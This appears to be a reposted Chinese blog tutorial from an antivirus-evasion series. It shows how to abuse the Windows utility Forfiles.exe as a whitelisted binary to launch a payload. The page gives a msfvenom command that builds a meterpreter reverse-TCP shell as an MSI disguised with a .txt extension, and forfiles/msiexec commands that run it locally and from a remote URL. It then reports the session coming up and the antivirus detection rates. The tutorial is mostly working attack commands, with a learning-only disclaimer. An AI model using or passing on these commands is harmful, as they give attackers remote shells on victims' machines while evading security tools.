远控免杀专题(60)-白名单Forfiles.exe执行payload

2014 年 1 月 24 日

声明：文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用，任何人不得将其用于非法用途以及盈利等目的，否则后果自行承担！

文章打包下载及相关软件下载： https://github.com/TideSec/BypassAntiVirus

一、Forfiles.exe介绍

Forfiles是一款windows平台默认安装的文件操作搜索工具之一，可以通过文件名称，修改日期等条件选择文件并运行一个命令来操作文件。它可以直接在命令行中使用，也可以在批处理文件或其他脚本中使用。
微软官方文档：https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/cc753551(v=ws.11
默认安装位置：

C:\WINDOWS\system32\forfiles.exe C:\WINDOWS\SysWOW64\forfiles.exe

说明：Forfiles.exe所在路径已被系统添加PATH环境变量中，因此，Forfiles命令可识别，需注意x86，x64位的Forfiles调用。

二、利用Forfiles.exe执行payload

使用msfvenom生成msi文件，指定后缀为txt。

msfvenom -p windows/meterpreter/reverse_tcp  LHOST=172.16.100.207 LPORT=4444 -f msi > TIDE.txt

移动到靶机上执行命令运行

forfiles /p c:\windows\system32 /m cmd.exe /c "msiexec.exe /q /i C:\Users\administrator\Desktop\TIDE.txt"

成功上线。

还可以通过远程访问的形式执行,同样可以成功上线。

forfiles /p c:\windows\system32 /m cmd.exe /c "msiexec.exe / q /i http://127.0.0.1/TIDE.txt"

打开杀软进行测试。360杀毒，360安全卫士，和火绒都报毒。

vt查杀率34/60

三、参考资料

https://micro8.github.io/Micro8-HTML/Chapter1/81-90/84_基于白名单Forfiles执行payload第十四季.html

M	T	W	T	F	S	S
« Jan
						1
2	3	4	5	6	7	8
9	10	11	12	13	14	15
16	17	18	19	20	21	22
23	24	25	26	27	28	29
30

演道网

远控免杀专题(60)-白名单Forfiles.exe执行payload

一、Forfiles.exe介绍

二、利用Forfiles.exe执行payload

三、参考资料

About The Author

stack

一、Forfiles.exe介绍

二、利用Forfiles.exe执行payload

三、参考资料

Related Posts

About The Author

stack